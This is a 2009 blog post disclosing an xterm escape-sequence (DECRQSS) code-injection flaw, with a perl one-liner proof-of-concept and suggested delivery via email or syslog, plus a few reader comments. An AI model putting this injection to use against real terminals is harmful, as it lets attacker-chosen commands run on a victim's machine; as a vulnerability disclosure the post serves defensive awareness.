Wednesday, January 14, 2009

Huge XTERM vulnerability.

Hi folks, today I found around the corner a huge XTerm code injection.
DECRQSS Device Control Request Status String "DCS $ q" simply echoes
(responds with) invalid commands.

Exploitability is the same as for the "window title reporting" issue
in DSA-380: include the DCS string in an email message to the victim,
or arrange to have it in syslog to be viewed by root.

So for example:
perl -e 'print "\eP\$q\netstat\n\e\\"' > bla.log
cat bla.log ; would run the "netstat" command.


Anonymous said...

Thanks a lot for publishing this vulnerability Marco, I just removed xterm and installed xfce-terminal, instead to safely cat.

Marco Ramilli said...

Thank you to read my blog !

Anonymous said...

Can anyone recommend the best Remote Desktop tool for a small IT service company like mine? Does anyone use or How do they compare to these guys I found recently: N-able N-central managed services software
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!